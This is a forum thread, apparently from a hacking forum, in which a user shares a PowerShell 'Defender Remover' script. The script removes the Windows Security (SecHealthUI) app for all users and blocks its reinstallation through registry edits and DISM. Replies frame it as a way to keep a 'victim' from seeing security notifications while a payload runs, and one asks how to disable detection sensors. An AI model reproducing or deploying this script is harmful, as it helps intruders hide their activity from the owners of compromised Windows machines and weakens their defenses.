Defender Remover

[VinokurovXX]

Привет
Только что нашел этот скрипт на GitHub и увидел, что он работает!

$remove_appx = @("SecHealthUI"); $provisioned = get-appxprovisionedpackage -online; $appxpackage = get-appxpackage -allusers; $eol = @()
$store = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore'
$users = @('S-1-5-18'); if (test-path $store) {$users += $((dir $store -ea 0 |where {$_ -like '*S-1-5-21*'}).PSChildName)}
foreach ($choice in $remove_appx) { if ('' -eq $choice.Trim()) {continue}
  foreach ($appx in $($provisioned |where {$_.PackageName -like "*$choice*"})) {
    $next = !1; foreach ($no in $skip) {if ($appx.PackageName -like "*$no*") {$next = !0}} ; if ($next) {continue}
    $PackageName = $appx.PackageName; $PackageFamilyName = ($appxpackage |where {$_.Name -eq $appx.DisplayName}).PackageFamilyName
    ni "$store\Deprovisioned\$PackageFamilyName" -force >''; $PackageFamilyName 
    foreach ($sid in $users) {ni "$store\EndOfLife\$sid\$PackageName" -force >''} ; $eol += $PackageName
    dism /online /set-nonremovableapppolicy /packagefamily:$PackageFamilyName /nonremovable:0 >''
    remove-appxprovisionedpackage -packagename $PackageName -online -allusers >''
  }
  foreach ($appx in $($appxpackage |where {$_.PackageFullName -like "*$choice*"})) {
    $next = !1; foreach ($no in $skip) {if ($appx.PackageFullName -like "*$no*") {$next = !0}} ; if ($next) {continue}
    $PackageFullName = $appx.PackageFullName;
    ni "$store\Deprovisioned\$appx.PackageFamilyName" -force >''; $PackageFullName
    foreach ($sid in $users) {ni "$store\EndOfLife\$sid\$PackageFullName" -force >''} ; $eol += $PackageFullName
    dism /online /set-nonremovableapppolicy /packagefamily:$PackageFamilyName /nonremovable:0 >''
    remove-appxpackage -package $PackageFullName -allusers >''
  }
}

 

[NMZ]

вау

 

[Maxim_Project_X]

Спасибо, что поделились. Это потрясающе!

Если кому-то интересно, что делает этот скрипт, в основном он удаляет пакет SecHealthUI Appx (приложение Windows Security Health) из системы.
Он обеспечивает удаление пакета для всех пользователей и предотвращает его автоматическую переустановку.

Он изменяет реестр, чтобы пометить пакет как депровизированный и отслуживший свой срок.

Он использует DISM и команды PowerShell, чтобы удалить пакет и сделать его не удаляемым.

 

[just_user]

is this ps1 script ?

 

[Overdriver]

is this ps1 script ?

Yes

 

[Dota2]

just remember that removing the UI of EDR not essentially gonna disable the edr functionality it's very known method but i never tested it i will test and give feedback thanks for sharing

 

[la-of-sh]

Тока удаляет ui, но не удаляет defender ATP

 

[Dota2]

Тока удаляет ui, но не удаляет defender ATP

yes this only remove the UI so victim can't see notification but it won't stop EDR fro detecting and deleting your payload

 

[Sec13B]

any detecting for sensors to disable ?

 

[Grimaldus]

Привет
Только что нашел этот скрипт на GitHub и увидел, что он работает!
...

Хорошо бы ещё ссылочку на оригинал приложить.

 

[VinokurovXX]

Defender_Remover/Defender_Remover.ps1 at main · Jenova774/Defender_Remover

Contribute to Jenova774/Defender_Remover development by creating an account on GitHub.

github.com